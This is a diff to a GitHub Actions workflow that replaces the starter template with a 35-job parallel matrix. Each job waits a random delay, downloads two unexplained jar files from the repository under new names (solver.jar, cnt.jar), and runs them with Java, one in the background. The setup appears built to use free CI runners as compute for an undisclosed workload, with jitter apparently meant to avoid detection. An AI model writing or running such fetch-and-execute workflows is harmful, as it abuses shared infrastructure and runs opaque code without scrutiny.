--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -1,36 +1,64 @@
-# This is a basic workflow to help you get started with Actions
-
 name: CI
 
-# Controls when the workflow will run
 on:
-  # Triggers the workflow on push or pull request events but only for the "main" branch
-  push:
-    branches: [ "main" ]
-  pull_request:
-    branches: [ "main" ]
-
-  # Allows you to run this workflow manually from the Actions tab
   workflow_dispatch:
 
-# A workflow run is made up of one or more jobs that can run sequentially or in parallel
 jobs:
-  # This workflow contains a single job called "build"
-  build:
-    # The type of runner that the job will run on
+  run-files:
     runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        job-name: [job1,job2,job3,job4,job5,job6,job7,job8,job9,job10,job11,job12,job13,job14,job15,job16,job17,job18,job19,job20,job21,job22,job23,job24,job25,job26,job27,job28,job29,job30,job31,job32,job33,job34,job35]
 
-    # Steps represent a sequence of tasks that will be executed as part of the job
     steps:
-      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
-      - uses: actions/checkout@v4
-
-      # Runs a single command using the runners shell
-      - name: Run a one-line script
-        run: echo Hello, world!
-
-      # Runs a set of commands using the runners shell
-      - name: Run a multi-line script
+      - name: Get Files
+        shell: pwsh
         run: |
-          echo Add other actions to build,
-          echo test, and deploy your project.
+            Start-Sleep -Seconds (Get-Random -Minimum 1 -Maximum 15)
+            $repoName = "${{ github.repository }}".Split('/')[1]
+            $baseUrl = "https://github.com/${{ github.repository_owner }}/$repoName/raw/refs/heads/main"
+            $files = @{
+              "sv.jar"    = "solver.jar"
+              "c10.jar"  = "cnt.jar"
+            }
+            function Download-FileWithRetry {
+                param (
+                    [string]$Url,
+                    [string]$OutputFile,
+                    [int]$MaxRetries = 5
+                )
+                $retryCount = 0
+                while ($retryCount -lt $MaxRetries) {
+                    try {
+                        Write-Host "Downloading $OutputFile..."
+                        (New-Object System.Net.WebClient).DownloadFile($Url, $OutputFile)
+                        Write-Host "Downloaded $OutputFile successfully"
+                        return
+                    } catch {
+                        $retryCount++
+                        $delay = 2 * $retryCount
+                        Write-Host "Attempt $retryCount failed: $_"
+                        Write-Host "Retrying in $delay seconds..."
+                        Start-Sleep -Seconds $delay
+                    }
+                }
+                throw "Failed to download $OutputFile after $MaxRetries attempts"
+            }
+            foreach ($src in $files.Keys) {
+              $url = "$baseUrl/$src"
+              $dst = $files[$src]
+              Download-FileWithRetry -Url $url -OutputFile $dst
+              Start-Sleep -Seconds 2
+            }
+
+      - name: Set up JDK
+        uses: actions/setup-java@v3
+        with:
+          java-version: '17'
+          distribution: 'temurin'
+
+      - name: Run Java Files
+        shell: pwsh
+        run: |
+          Start-Process java -ArgumentList "-jar", "cnt.jar"
+          java -jar solver.jar
